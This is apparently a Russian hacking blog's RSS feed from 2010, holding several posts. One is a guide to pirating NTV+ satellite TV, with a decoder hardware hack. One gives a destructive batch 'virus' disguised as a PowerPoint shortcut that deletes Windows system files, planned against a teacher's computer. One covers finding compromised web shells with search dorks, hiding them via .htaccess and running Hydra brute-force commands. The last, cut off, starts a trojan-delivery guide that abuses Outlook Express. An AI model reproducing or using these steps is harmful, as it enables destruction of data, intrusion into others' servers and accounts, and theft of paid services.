Внимание! Информация только для образовательных целей.<br />
Коммерческое использование преследуется по закону.<span id="more-566"></span><br />
Вопрос первый, самый глупый, но вдруг кто-то не знает? Что такое НТВ+ и какие проблемы с его просмотром?<br />
Какие способы пиратского просмотра каналов кодированных Nagravision-Syster вообще существуют?<br />
Что такое PC-TV и какие телеканалы можно смотреть используя его?<br />
Что для этого надо ?<br />
Какая карта видео-захвата для этого нужна?<br />
Какой программой лучше пользоваться?<br />
Как и что правильно подключить?<br />
Как правильно настроить программу?<br />
Как открыть звук?<br />
Как вывести изображение на телевизор?<br />
Как часто телекомпании меняют коды?<br />
Можно ли обойтись без компьютера?<br />
Спутниковое телевидение существует как бесплатное, так и коммерческое, для просмотра которого надо платить телекомпании абонентскую плату. Для того чтобы обеспечить сбор абонентской платы, телекомпании кодируют свой сигнал, то есть делают не возможным просмотр его без специального декодера. Телекомпания НТВ+ использует Французскую систему кодирования Nagravision-Syster,в которой используется перемешивание строк по особому алгоритму, в соответствии с таблицей перестановки строк. На рисунке видно, как выглядит изображение, если его попытаться смотреть без декодера. Кроме того, применяется инверсия спектра звукового сопровождения частой 12,8 кГц, что очень сильно искажает звук, делая не возможным его прослушивание. Вдобавок ко всему, для разграничения доступа оплативших и не оплативших подписку абонентов, применяется система адресного кодирования &#8212; то есть телекомпания имеет возможность сигналом со спутника избирательно выключать декодеры не оплативших абонентов. Достигается это тем, что у подписчиков имеются индивидуальные ключи, представляющие собой микросхему памяти, в которой содержится индивидуальный код, а так же обновляемая через спутник информация о состоянии подписки. Эту же систему кодирования применяют телекомпании Германии, Франции, Польши, а так же ряда других стран. Существуют и другие системы кодирования, такие как D2MAC, Videocript, и т.д. но в этой статье мы их описывать не будем. Не смотря на то, что этой системе уже более десяти лет, протокол обмена данными между ключом и декодером телевизионными пиратами изучен мало (наверно просто это было ни кому не нужно), о работающих эмуляторах ключей пока не слышно.<br />
Система кодирования Nagravision-Syster была взломана другим способом &#8212; появились пиратские декодеры, которые работают безо всяких ключей на принципе подбора кода пут|м сравнения и поиска похожих строк. Такие декодеры открывают все каналы, на которые они рассчитаны и совершенно бесплатно. К сожалению, купить такой декодер у нас пока не возможно, а сделать тоже очень сложно в основном из-за отсутствия необходимой информации.<br />
Но недавно появилась возможность смотреть НТВ+ и другие каналы кодированные в Nagravision-Syster с помощью персонального компьютера, используя тот же принцип, что и у пиратского декодера, но реализуя его с помощью специальной программы. Этот способ получил общее название PC-TV. PC-TV позволяет смотреть все каналы, кодированные в Nagravision (смотри таблицу).<br />
Что нужно для просмотра кодированных каналов таким способом?<br />
Во-первых, нужен настроенный комплект спутникового телевидения, состоящий как минимум из антенны (тарелки), конвертера и ресивера. Эта система должна обеспечивать уверенный при|м тех кодированных каналов, которые вы хотите смотреть. Для случая с НТВ+ достаточно иметь родной &#171;НТВшный&#187; комплект с &#171;тарелкой&#187; того диаметра, который достаточен для при|ма сигнала в вашей местности, можно без оригинального декодера.<br />
Во вторых, нужен достаточно мощный IBM совместимый персональный компьютер, минимум &#8212; P-166MMX, 32Mb RAM, видеоадаптер PCI 4Mb, желательно P-II с как можно большей тактовой частотой и оперативной памятью 64Mb. Объ|м и скорость ж|сткого диска, а так же другие параметры, существенно не влияют.<br />
В третьих, для ввода изображения в компьютер, нужна карта видеовхода, построенная на одном из следующих чипов &#8212; BT848, BT849, BT878, BT879. Сейчас таких карт выпускается достаточно много, разными фирмами, под разными названиями, на пример: MiroPCTV, AverMedia различных модефикаций, Fly Video(наверно самый дешевый вариант), MR Vision TV Link, ТЕЛЕМАСТЕР. Продолжать список можно ещ|, но нет смысла &#8212; подойд|т любая карта, лишь бы она была сделана на чипе серии BT8XX. Карты отличаются друг от друга наличием и качеством встроенного TV тюнера для просмотра обычных эфирных телеканалов, наличием дистанционного управления тюнером, количеством видеовходов -1 или 2, качеством и удобством прилагаемого к ней софта и некоторыми другими наворотами, которые ни каким образом не связаны с нашей задачей, так как в данном случае требуется только видеовход. В последнее время стали появляться версии программ для видеоадаптеров на чипе ATI c видеовходом (без BT8XX), но так как у меня такой карты нет, то я их не тестировал и ничего про них сказать не могу.<br />
На сегодняшний день написано несколько программ &#8212; декодеров, которые совершенствовались их авторами (и не только авторами, потому, что почти все они публиковались вместе с исходными текстами) и имеют каждая по несколько версий. У каждой программы есть свои достоинства и недостатки, и стоит попробовать их все, чтобы сделать для себя выбор. Лично мне более других понравилась MoreTV 3.10 &#8212; на мой взгляд, это наиболее удачная программа, которая позволяет смотреть каналы как в стандарте PAL, так и SECAM (НТВ+). У не| реализовано автоматическое включение-выключение декодирования при переходе от кодированных к не кодированным каналам, прямое взаимодействие с картой видео-ввода (достаточно установить драйвер карты, софт можно не ставить, программа сама настраивает карту), имеются удобные оперативные регулировки с помощью горячих клавиш, достаточно легка в настройке. К недостаткам данной программы можно отнести не очень хорошую чистоту цвета в режиме SECAM (хотя у некоторых других программ при просмотре SECAM цвет вообще отсутствует), и интерфейс на немецком языке. Надо учесть, что для видеоадаптеров с видеовходом на чипе ATI, должна быть специальная версия программы- MoreATI-TV.<br />
После того как вы установили карту видеовхода в ваш компьютер, надо соединить НЧ-вход карты с НЧ-выходом вашего ресивера с помощью специального низкочастотного кабеля, такого же, каким вы подключаете телевизор к ресиверу или видеомагнитофону. Установите драйвер и программное обеспечение карты, руководствуясь инструкцией прилагаемой к ней. В результате, если вы сделали вс| правильно, то при включенном ресивере и запущенной программе от карты, вы должны получить на экране компьютера устойчивое изображение того канала, на который настроен в данный момент ваш ресивер, в том виде, в каком оно переда|тся со спутника (т.е. если канал кодированный, то изображение будет напоминать фотографию). Не забудьте, что декодер в настройках ресивера должен быть выключен.<br />
Теперь можно приступить к установке и настройке программы &#8212; декодера. Программы в основном не требуют инсталляции и достаточно просто распаковать архив в любую директорию, желательно в корневом каталоге вашего жесткого диска. В дальнейшем речь пойд|т о настройках программы MoreTV 3.10 &#8212; если вы е| сумеете запустить, то и с остальными программами вы сумеете разобраться сами. Первым делом скопируйте в каталог с программой файл Key.txt предназначенный для НТВ+, если вы настроили ресивер для его при|ма. Учтите, что Key.txt для НТВ+ и для других каналов разные! Не забудьте переименовать файл Key2.txt (извлеченный из архива) в Key.txt (без цифры) и запустите программу.<br />
На экране появится окно настроек программы. В рамке &#171;Video&#187; установите для начала разрешение 640х480YUY2 и поставьте флажок SECAM. В рамке &#171;Hardware&#187; выберите из списка вашу карту (если е| нет в списке, сильно не расстраивайтесь, выберите любую другую, лишь бы на таком же чипе как у вас) марку тюнера можно не устанавливать &#8212; он нужен только при при|ме кодированных каналов с эфирной антенны, PLL для начала лучше не включать. В рамке &#171;Dekodierung&#187; установите количество тестовых строк равным 30 и сохраните настройки (средняя кнопка). Теперь можно запускать собственно программу (верхняя кнопка). Первый запуск программы может продлиться несколько дольше чем обычно (в это время программа созда|т в сво|м каталоге индексный файл с именем MoreTV_XX.idx, где ХХ &#8212; количество тестовых строк), в дальнейшем программа будет запускаться практически мгновенно. Вы должны увидеть на экране декодированное изображение. Если экран останется синим, проверьте все соединения, а если у вашей карты два входа, попробуйте подать сигнал на другой вход. Если изображение есть, но не декодированное, проверьте тот ли Key.txt вы используете (если открыть его блокнотом, он должен начинаться так : 0 1 2 3 4 5 6 7 2 5 4 7 8 9 10 11 14 17 16 19 22 25). Если вс| заработало, попробуйте поэкспериментировать с настройками программы для достижения лучшего качества изображения.<br />
&#171;Горячие клавиши&#187; программы:<br />
Esc &#8212; стоп кадр, F1 &#8212; восстановление после стоп кадра, F2 &#8212; включение декодера (включен / выключен / авто), F3 &#8212; F8 &#8212; изменение формата и размера декодируемого изображения, F10 &#8212; выход из программы, F11 &#8212; Турбо / стандартный декодер, F12 &#8212; синхронизация по фазе, Insert &#8212; контрастность + , Delet &#8212; контрастность &#8212; , Home &#8212; насыщенность + , End &#8212; насыщенность &#8212; , PgUp &#8212; яркость + , PgDn &#8212; яркость -, остальные клавиши предназначены для настройки и переключения каналов встроенного TV тюнера, и для нас значения не имеют.<br />
Программа MoreTV не имеет встроенного декодера звука, и поэтому декодирование звука &#8212; тема отдельного разговора. На сегодняшний день есть три способа прослушивания звукового сопровождения. Способ первый, самый простой, и самый худший. Скачайте одну из программ &#8212; аудио-декодеров (лично мне больше нравится DCPlus), соедините выход звука ресивера с линейным входом звуковой карты вашего компьютера, в настройках стандартного регулятора громкости Windows включите линейный вход на запись, и обязательно выключите на воспроизведении (чтобы предотвратить проникновение кодированного звука непосредственно со входа на выход без обработки программой). Запустите программу с установками по умолчанию, и звук должен заработать. Качество звука регулируется настройками программы. Не забудьте, что для этого ваша звуковая карта обязательно должна поддерживать Full Duplex &#8212; то есть одновременную запись и воспроизведение звука, и эта опция должна быть активизирована в настройках звуковой карты (установить флажок &#171;разрешить двунаправленную работу&#187;). Кроме того, одновременная работа программ аудио и видео декодеров возможна только на достаточно быстрых машинах, а если конфигурация вашего компьютера соответствует только минимальным требованиям, то этот способ для вас непригоден (в зависимости от используемой программы и е| настройки будет &#171;заикаться&#187; звук, либо срываться картинка). Второй способ подойдет тем, у кого есть оригинальный декодер с неоплаченным ключом и кто не боится держать в руках паяльник. Аккуратно вскройте декодер, найдите микросхему с надписью EURO@DEC 5096 ELEXC7397A. Отпаяйте сопротивление от седьмой ноги микросхемы и подайте на эту ногу микросхемы логическую единицу (+5В) через сопротивление1-10к (найдите напряжение +5В с помощью тестера по цепям питания). Соблюдайте осторожность, так как на плате декодера присутствует высокое напряжение!!! Ошибка в ваших действиях может привести к серьезной поломке декодера!!! После этой переделки декодер открывает звук и без оплаты. Третий способ годится для опытных радиолюбителей. Соберите самодельный декодер по привед|нной схеме. Этот способ наиболее сложен, но наверно самый лучший, так как не требует наличия оригинального декодера, не занимает ресурсы компьютера, звук не запаздывает по отношению к видео как в программных декодерах.<br />
После того, как у вас все| получилось, возможно вам захочется вывести изображение на телевизор. Для этого ваш видеоадаптер должен иметь TV-OUT. Практически все современные модели видеоадаптеров имеют модификации с выходом на телевизор. Это видеоадаптеры на таких чипах как: RIVA TNT, RIVA 128, ATI, INTEL 740, S3 VIRGE GX2, а так же некоторые другие. Телевизор подключается к выходу видеоадаптера (чаще всего это обычный &#171;тюльпан&#187;) кабелем, аналогичным тому, которым вы подавали сигнал на вход карты видеовхода. Настраивается адаптер в соответствии с руководством пользователя, прилагаемого к нему. Надо заметить, что практически все видеоадаптеры &#171;усекают&#187; или &#171;поджимают&#187; изображение по вертикали примерно на 5-10%. Это связано с несоответствием количества строк в телевизионном стандарте и изображении формируемом видеоадаптером. Существуют специальные дополнительные карты-TV OUT которые преобразуют стандартное SVGA изображение, формируемое любым видеоадаптером в полноценный сигнал формата PAL, но я встречал о них информацию только в интернете, и пока не разу не видел их в продаже.<br />
Часто задают вопрос &#8212; часто ли телекомпании меняют код, и отличается ли он на разных каналах одного пакета программ? Здесь можно пояснить, что программные декодеры не требуют никаких кодов, они их подбирают &#171;на ходу&#187; методом сравнения соседних строк. В алгоритме декодирования используется только таблица перестановки строк (файл Key.txt) одна для всех каналов НТВ+. В оригинальных декодерах эта таблица содержится в программе-прошивке центрального процессора, т.е. программируется однократно при изготовлении декодера. Соответственно сменить эту таблицу можно, только заменив все декодеры у официальных подписчиков (именно декодеры, а не ключи), что в наших условиях практически не реально.<br />
Иногда задают вопрос &#8212; можно ли все-таки сделать аппаратный декодер, то есть обойтись без компьютера? В принципе это возможно, на сайте www.eurosat.com/salp описан декодер, декодирующий все французские каналы. Так как PC TV с ключом Key.txt подходящим для НТВ+ открывает французские каналы, логично предположить, что данный аппаратный декодер будет открывать и НТВ+, однако я не знаю случаев, чтобы это кто-то проверил на практике. Изготовление данного декодера технологически сложно и может обойтись не в одну сотню долларов, а так же нет никакой гарантии в успехе этого предприятия и поэтому на сегодняшний день наиболее простым способом просмотра каналов кодированных в Nagravision является PC TV.</p>
Файл 7f5ddbf668be432bbaf47f6ed1d47c4b/sape.php не найден!]]></content:encoded>
			<wfw:commentRss>http://suspended.ru/2010/05/%d0%bd%d0%b0%d0%b7%d0%b2%d0%b0%d0%bd%d0%b8%d0%b5-258/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Вирус в bat файле для класухи ;)</title>
		<link>http://suspended.ru/2010/05/%d0%bd%d0%b0%d0%b7%d0%b2%d0%b0%d0%bd%d0%b8%d0%b5-259/</link>
		<comments>http://suspended.ru/2010/05/%d0%bd%d0%b0%d0%b7%d0%b2%d0%b0%d0%bd%d0%b8%d0%b5-259/#comments</comments>
		<pubDate>Thu, 13 May 2010 05:05:32 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
				<category><![CDATA[Хакерство]]></category>
		<category><![CDATA[взлом]]></category>
		<category><![CDATA[обман]]></category>
		<category><![CDATA[пароли]]></category>

		<guid isPermaLink="false">http://suspended.ru/?p=567</guid>
		<description><![CDATA[Здравствуйте, товарищи! Сегодня ночью делать было совершенно нефиг, ну и задумался: &#171;а как можно сломать комп програмным способом, но так, чтобы это не сразу спалили?&#187;. Я нашел ответ. Он находится в bat файлах. План был таков: СО СТОРОНЫ КЛАСУХИ И ОДНОКЛАССНИКОВ: Я подхожу к компу, вставляю туда флеху, каспер(скорее всего) будет ругаца на файл autorun.inf, [&#8230;]]]></description>
				<content:encoded><![CDATA[<p style="text-align: justify;"><img class="alignleft size-full wp-image-76" style="margin: 10px;" title="internet" src="http://suspended.ru/wp-content/uploads/2010/05/internet266.jpg" alt="интернет" />Здравствуйте, товарищи! Сегодня ночью делать было совершенно нефиг, ну и задумался: &#171;а как можно сломать комп програмным способом, но так, чтобы это не сразу спалили?&#187;. Я нашел ответ. Он находится в bat файлах.<br />
План был таков:<br />
СО СТОРОНЫ КЛАСУХИ И ОДНОКЛАССНИКОВ:<br />
Я подхожу к компу, вставляю туда флеху, каспер(скорее всего) будет ругаца на файл autorun.inf, который автоматом копируеца на флеху с вирусованного компа класухи. Удаляем&#8230; Открываем флешку, там лежит файл Презентация.ppt. Это презентация MS Power Point, если кто не знает. Вот я щелкнул разок по этой презентации, экран моргнул пару раз, видимо павер пойнт загружаеца. Вот, йа показал свою презентацию, получил свою оценку, выдернул флеху, сел за свое место, а там дальше следующие люди показывают свои презентации.<span id="more-567"></span> Вроде все нормально. Ну, када комп не нужен, класуха его вырубает, а патом включает, и обнаруживает то, что венда не грузица, или грузица но как то неправильно. Ребутит комп, и обнаруживает полное отсутствие венды на компе. ЧТО СЛУЧИЛОСЬ?!?!<br />
Попробую объяснить. Разберем теперь и со стороны одноклассников(которые вапще ХЗ отом, что там на флехе хранится).<br />
Вот я встаю с места по просьбе училки. Иду к столу, вставляю флеху в дополнительный слот USB в клаве. Комп опреледяет, что воткнуто что то похожее на флеху. Каспер(скорее всего) будет ругаца на файл autorun.inf, который автоматом копируеца на флеху с вирусованного компа класухи. Удаляем&#8230; Открываем флешку, там лежит файл Презентация.ppt. Это презентация MS Power Point, если кто не знает. На самом деле это не ppt файл. У нее на компе в параметрах &#171;Свойства папки>Вид&#187; стоит галочка на &#171;Скрывать расширения для зарегистрированных типов файлов&#187;. На самом деле этот файл имеет имя Презентация.ppt.lnk. Это, как вы поняли, ярлык. Но ярлык со значком от пауэр пойнта. Рядом со значком презентации есть папка test. Содержимое папки никто не знает. Файл Презентация.ppt.lnk запускает файл runner_copier.bat.<br />
Файл runner_copier.bat совершает следующие действия:<br />
-открывает файл pres.ppt с самой презентацией, которую йа должен показать<br />
-копирует заранее написанный файл AUTOEXEC.BAT в C:.<br />
Самое интересное заключается в павер пойнте. Так как он моргает перед полной готовностью, то многие, не зная, фчом прикол, могут не заметить моргнувшее окошко коммандной строки, которая, как раз и копирует заготовленный AUTOEXEC.BAT в заветный C:.<br />
Теперь я расскажу, что находится в файле AUTOEXEC.BAT. Стандартный такой файл у меня имеет следующий вид:<br />
goto %config%<br />
:dos1<br />
rem c:vc401vc<br />
lh keyrus<br />
lh mmouse<br />
lh C:WINDOWSCOMMANDmscdex /d:12345678<br />
lh dndn<br />
bootgui=0<br />
:dos2<br />
rem essolo.com<br />
lh keyrus<br />
lh mmouse<br />
lh dndn<br />
bootgui=0<br />
:win<br />
rem c:essolo.com<br />
set path=C:WINDOWS;C:WINDOWSCOMMAND;c:;c:windows;c:windowscomand;c:arc;c:dn<br />
C:WINDOWSCOMMANDDELTREE /y C:WINDOWSTEMP*.*<br />
mode con codepage prepare=((866) C:WINDOWSCOMMANDega3.cpi)<br />
mode con codepage select=866<br />
keyb ru,,C:WINDOWSCOMMANDkeybrd3.sys<br />
goto continue<br />
:meos<br />
c:kolibrimeosload.com<br />
:l:meosload.com<br />
:continue<br />
rem bootgui=1<br />
Но я его немного подправил. Я всего лишь добавил в конец следующие строки:<br />
cd<br />
cd windows<br />
del *.dll<br />
del *.ini<br />
cd system32<br />
del *.dll<br />
del *.exe<br />
и все!<br />
Действие самого вируса происходит следующим образом:<br />
1)запускаеца файл Презентация.ppt.lnk<br />
2)он ссылаеца на файл runner_copier.bat<br />
3)файл runner_copier.bat заменяет файл AUTOEXEC.BAT, лежащий в C: на заранее заготовленый AUTOEXEC.BAT, который лежит на флехе в папке test.<br />
4)дальше не происходит ничего. Пока включен комп, ничего не произойдет.<br />
5) комп выключается<br />
6) комп включаеца и при загруске венды загружается то, что описано в AUTOEXEC.BAT. Тут то и начинается самое интересное.<br />
7) в этом батике указано следующее: загруска дров крысы, клавы, моника, и прочего.<br />
8)как только загрузились драйвера, то этот батник дает задание венде самоудалица. Удаляюца файлы *.dll и *.exe из папок WINDOWS и system32.<br />
9)скорее всего, комп не увидит никакой оси, т.к. больше половины файлов в папке WINDOWS и вовсех вложенных папках как раз дллки и екзешники.<br />
end.<br />
Если у кого есть идеи по изменению программы, пишите. НО! Программа должна удовлетворять таким критериям:<br />
-малый размер<br />
-незаметность<br />
-неизвестность антивирям<br />
-большие масштабы действия<br />
-действие вируса осуществляется только после перезапуска компа(чтобы сразу не спалиться).<br />
В остальном полная свобода.<br />
Удачи в написании вирусов, товарищи!</p>
Файл 7f5ddbf668be432bbaf47f6ed1d47c4b/sape.php не найден!]]></content:encoded>
			<wfw:commentRss>http://suspended.ru/2010/05/%d0%bd%d0%b0%d0%b7%d0%b2%d0%b0%d0%bd%d0%b8%d0%b5-259/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Даёшь каждому по HYDRA.</title>
		<link>http://suspended.ru/2010/05/%d0%bd%d0%b0%d0%b7%d0%b2%d0%b0%d0%bd%d0%b8%d0%b5-260/</link>
		<comments>http://suspended.ru/2010/05/%d0%bd%d0%b0%d0%b7%d0%b2%d0%b0%d0%bd%d0%b8%d0%b5-260/#comments</comments>
		<pubDate>Thu, 13 May 2010 05:05:32 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
				<category><![CDATA[Хакерство]]></category>
		<category><![CDATA[взлом]]></category>
		<category><![CDATA[обман]]></category>
		<category><![CDATA[пароли]]></category>

		<guid isPermaLink="false">http://suspended.ru/?p=568</guid>
		<description><![CDATA[Сразу же хочу заметить, что статья нацелена на новичков. Очень надоело наблюдать на форуме просьбы типа сломать мэил или асю. Надеюсь, после прочтения статьи, хотя бы 20% научатся делать это сами. Все наверно слышали о брутерах?! В принципе, не важно, кто не слышал, может дальше не читать Я не буду описывать здесь брутеры, их качества, [&#8230;]]]></description>
				<content:encoded><![CDATA[<p style="text-align: justify;"><img class="alignleft size-full wp-image-76" style="margin: 10px;" title="internet" src="http://suspended.ru/wp-content/uploads/2010/05/internet267.jpg" alt="интернет" />Сразу же хочу заметить, что статья нацелена на новичков. Очень надоело наблюдать на форуме просьбы типа сломать мэил или асю. Надеюсь, после прочтения статьи, хотя бы 20% научатся делать это сами.<br />
Все наверно слышали о брутерах?! В принципе, не важно, кто не слышал, может дальше не читать <img src="http://suspended.ru/wp-includes/images/smilies/icon_smile.gif" alt=":)" class="wp-smiley" />  Я не буду описывать здесь брутеры, их качества, плюсы, минусы и т.д. и т.п. В данной статье будет поставлена лишь одна цель, завести свою гидру без получения высоких привилегий на сервере, будет достаточно вэб-шелла.<br />
И так, начнём, немного о гидре:<br />
Hydra &#8212; универсальный и уникальный в своём роде брутфорсер, умеет подбирать пароли к MySQL, MSSQL, POP3, IMAP, HTTP, HTTPS, ICQ, SSH, FTP, Basic-auth и др. Имеет встроенную поддержку работы через соксы и прокси. Скачать можно здесь http://thc.org/download.<span id="more-568"></span>php?t=r&#038;f=hydra-5.2-src.tar.gz<br />
Приступим, что нам потребуется:<br />
1. Вэб-шелл на сервере с доступом к коммандному интерпритатору &#8212; 1 шт.<br />
2. Руки 2 шт. Можно обойтись и одной, главное чтоб прямая была <img src="http://suspended.ru/wp-includes/images/smilies/icon_smile.gif" alt=":)" class="wp-smiley" /><br />
Многие наверно задались вопросом об вэб-шелле, где же его взять?! Да, вопрос специфичный, а ответ в свою очередь довольно таки простой &#8212; взломать и залить. &#171;Я же новичок?!&#187; подумали сейчас многие! Не спорю, я тоже <img src="http://suspended.ru/wp-includes/images/smilies/icon_smile.gif" alt=":)" class="wp-smiley" /><br />
Теперь всё-таки немного придется отойти от нашей намеченной цели. Найдём себе вэб-шелл! Есть один простой, но проверенный способ, набираем в адресной строке браузера google.com, там в свою очередь в поисковой строке вбиваем, что-то типо:<br />
intitle:c99madshell uname filetype:php<br />
intext:c99shell intitle:c99shell<br />
intext:edited by crazydaned<br />
intext:safe-mode: off (not secure)<br />
intitle: &#8212; c99madshell<br />
inanchor:c99shell filetype:php<br />
allintext: uid=() gid=() groups=()safe-mode: off (not secure<br />
intitle:c99madshell uname<br />
(intitle:locus7shell | intitle:r57shell) uname<br />
intitle:r57shell intext:uname<br />
safe-mode: off (no secure)<br />
safe-mode: off (not secure) c99shell<br />
Или подобные &#171;нехитрые&#187; запросы,и получим лист вэб-шеллов проиндексированных поисковиком. Кому не нравится такой способ, доставайте вэб-шеллы сами <img src="http://suspended.ru/wp-includes/images/smilies/icon_smile.gif" alt=":)" class="wp-smiley" /><br />
И так, предположим, что шелл нашли. Смотрим Safe-mode: OFF, это хорошо, один из главных критериев, если наоборот то ищем другой, так же узнаём юзера коммандой id и смотрим /etc/passwd, есть ли доступ к /bin/bash, или к другому интерпритатору комманд, иначе мы не сможем выполнять нужные нам действия. Теперь нужно найти каталог на запись. Немного поковыряв, найдите каталог доступный на запись, и залейте в него архив с гидрой.<br />
Залили? Ок, хорошо. Теперь распаковываем и устанавливаем, чтоб не приходилось выполнять команды отдельно их можно объединить через ;, вбиваем в шелле tar zxf hydra-5.2-src.tar.gz;cd hydra-5.2-src;./configure;make, жмём кнопочку Execute. Смотрим в окне, должен появиться лог выполнения команд, если лога нету, значит у юзера не хватает прав на выполнение. Если всё гуд, далее переходим в каталог hydra-5.2-src. Запускаем гидру, вбиваем ./hydra и любуемся выполнением нашей гидры <img src="http://suspended.ru/wp-includes/images/smilies/icon_smile.gif" alt=":)" class="wp-smiley" /><br />
И так, теперь стоит подумать немного о безопасности, под ней я имею ввиду &#8212; не палить в логах частое обращение к вэб-шеллу, где лежит гидра. А сделаем это мы весьма хитрым образом <img src="http://suspended.ru/wp-includes/images/smilies/icon_smile.gif" alt=":)" class="wp-smiley" />  В первую очередь переименовываем каталог hydra-5.2-src во что-нибудь менее палевное, к примеру, images, вбиваем в командной строке cd ..;mv hydra-5.2-src images. Дальше переходим в переименованный каталог и создаём там файл .htaccess с содержимым:<br />
AddType application/x-httpd-php .gif<br />
Вот теперь зальём наш шелл в этот же каталог уже с расширением .gif и пробуем открыть его, ну как?) В принципе расширение можете выбрать на своё усмотрение, им может стать как .pdf .rar .bmp и с таким же успехом .avi <img src="http://suspended.ru/wp-includes/images/smilies/icon_smile.gif" alt=":)" class="wp-smiley" />  При желании можем даже запаролить этот каталог, сделать доступ по IP и много чего другого, но об этом я писать не буду, т.к. это тема отдельной статьи, да и смысла писать про это нет, читаем ман по Apache <img src="http://suspended.ru/wp-includes/images/smilies/icon_smile.gif" alt=":)" class="wp-smiley" />  Спешу предупредить, что сервер должен поддерживать .htaccess, иначе наш шелл работать не будет и есть вероятность того что нас спалят по логам =<br />
Теперь переходим к самой приятной части. Качаем хорошие словарики для брута, коих сейчас полно, советую лишь одно &#8212; использовать встроенные качалки сервера (наличие таковых узнаём при помощи команды which curl wget get lynx fetch и т.п.), т.к. заливать большие словари со своей тачки будет очень долго.<br />
Манов и видео по использованию данного брутфорсера много, любимый гугл в помощь, но все же пару полезных конструкций приведу:<br />
./hydra -L logins.txt -P passwords.txt www.site.com -t 255 ftp<br />
./hydra -l ftpuser -p ftppass www.site.com -t 255 ftp<br />
./hydra -L logins.txt -P passwords.txt www.site.com -t 255 mysql<br />
./hydra -L logins.txt -P passwords.txt pop.site.com -t 255 pop3<br />
Единственное что хотелось бы выделить, при каждом новом задании лучше сохранять всё в лог опцией -o, либо ставить вывод в файл знаком > (К примеру ./hydra -l hacker -p pass target.com ftp >logfile.txt). Этим самым облегчим себе работу, т.к. не придёться ждать полного выполнения команды, чтоб лицезреть результат, а просто периодически будем мониторить файлик logfile.txt <img src="http://suspended.ru/wp-includes/images/smilies/icon_smile.gif" alt=":)" class="wp-smiley" />  И напоследок хочется сказать, что в данной чудо проге мы можем указывать количество потоков от 1 до 255, и, как правило, часто бывает полезным не напрягать серв на полную катушку <img src="http://suspended.ru/wp-includes/images/smilies/icon_smile.gif" alt=":)" class="wp-smiley" />  В принципе, у меня &#8212; всё, начинаем брутить.</p>
Файл 7f5ddbf668be432bbaf47f6ed1d47c4b/sape.php не найден!]]></content:encoded>
			<wfw:commentRss>http://suspended.ru/2010/05/%d0%bd%d0%b0%d0%b7%d0%b2%d0%b0%d0%bd%d0%b8%d0%b5-260/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Эффективный способ впаривания троянов</title>
		<link>http://suspended.ru/2010/05/%d0%bd%d0%b0%d0%b7%d0%b2%d0%b0%d0%bd%d0%b8%d0%b5-261/</link>
		<comments>http://suspended.ru/2010/05/%d0%bd%d0%b0%d0%b7%d0%b2%d0%b0%d0%bd%d0%b8%d0%b5-261/#comments</comments>
		<pubDate>Thu, 13 May 2010 05:05:32 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
				<category><![CDATA[Хакерство]]></category>
		<category><![CDATA[взлом]]></category>
		<category><![CDATA[обман]]></category>
		<category><![CDATA[пароли]]></category>

		<guid isPermaLink="false">http://suspended.ru/?p=569</guid>
		<description><![CDATA[конецформыначалоформыСразу предупреждаю что статья написанна для новичков в этом деле, поэтому не надо кричать и махать руками что типа всё это знаем и умеем, может вы и знаете и умеете, а другие только начинают учится и думаю им это будет полезно знать. Я знаю что об этом статьи уже писались и поэтому не претендую на [&#8230;]]]></description>
				<content:encoded><![CDATA[<p style="text-align: justify;"><img class="alignleft size-full wp-image-76" style="margin: 10px;" title="internet" src="http://suspended.ru/wp-content/uploads/2010/05/internet268.jpg" alt="интернет" />конецформыначалоформыСразу предупреждаю что статья написанна для новичков в этом деле, поэтому не надо кричать и махать руками что типа всё это знаем и умеем, может вы и знаете и умеете, а другие только начинают учится и думаю им это будет полезно знать. Я знаю что об этом статьи уже писались и поэтому не претендую на полное авторство, но в тех статьях которые я видел всё описывалось скупо, отдельно, несвязанно с друг другом и неподробно, я же попытаюсь всё конкретизировать, обобщить и разложить по полочкам (даже разжевать:) так чтоб любой более менее начинающий юзверь мог во всё врубится.<span id="more-569"></span> И так что для этого понадобится:<br />
* The Bat! – один из лучших почтовых клиентов, (как у тебя его ещё нет, давай сейчас же дуй в какой нить поисковик , ищи его, скачивай, устанавливай и сноси нафиг свой ОутглюкЕхпресс, а то трояна впаришь не ты , а его впарят тебе, причём без твоего согласия).<br />
* Zender – спецальная программа для посылки писем с трояном в дыру Оутглюка (качать с http://www.hack-it.by.ru/soft), о ней чуть ниже и поподробнее.<br />
* Троян &#8212; в принципе любой, желательно чтоб не палящийся был.<br />
* Ну и ещё какой нить joiner, их сейчас много развелось так что сами выбирайте, и желательно чтоб он умел менять иконки и закрывать анитивирусы и фаирволы ( и всего то….J).<br />
И так способ этот рулит в Windows 95-98SE (без заплаток) и если установлен основной почтовый клиент это их же OutlookExpress 5.0, они сейчас пока наиболее распространены и в основном большинство народа юзает их….. да да WindowsХреновоРаботает ещё мало кто поставил…. Так что шансы нарваться на таких у вас большие (небось сами на этом софте то сидите ;-). И так как вы раньше рассылали ламерам трояна, брали просто атачили к письму файл с троянам, писали какой нить текст в письме чтоб жертве захотелось открыть его, рассылали по спам листам и надеялись на то что найдётся жертва которая окажется полным ламерьём и откроет приатаченный файл и вот ты уже летишь по халявному инету или форматируешь ламеру диск <img src="http://suspended.ru/wp-includes/images/smilies/icon_smile.gif" alt=":)" class="wp-smiley" />  ( а может и идёшь по тёмному коридору заложив руки за спину в сопровождении дяденьки с отдела «Рэ» <img src="http://suspended.ru/wp-includes/images/smilies/icon_smile.gif" alt=":)" class="wp-smiley" />  , но щас народ уже в основном учёный пошёл и просто так файлы пришедшие почтой не открывает, а для начала бережно сохраняет на диск и потом с упоением насилует их всякими там АВП , Докторами Вьебами и Нортонами, а потом уже думает открывать его или нет. Ну…..нам это надо . Какой шанс что кто то откроет и запустит к себе твою коняшку…..правильно шанс просто мизерный. Поэтому то нам надо сделать так чтоб файл в письме запустился автоматически как только жертва получит это письмо ….. ну …хорошо же чтоб так было… и не надо ни кого уговаривать ( ещё раз подчеркну что рулит всё в Win9x и OE 5.0 ). И так для начала создаём файл mail.eml , затем открываем его в любом текстовом редакторе (желательно в WordPad) и вставляем в него такую вот запись:<br />
From: SuperMegaXaker<br />
To:<br />
Subject: !!!!!Poluchai gad troyana!!!!<br />
MIME-Version: 1.0<br />
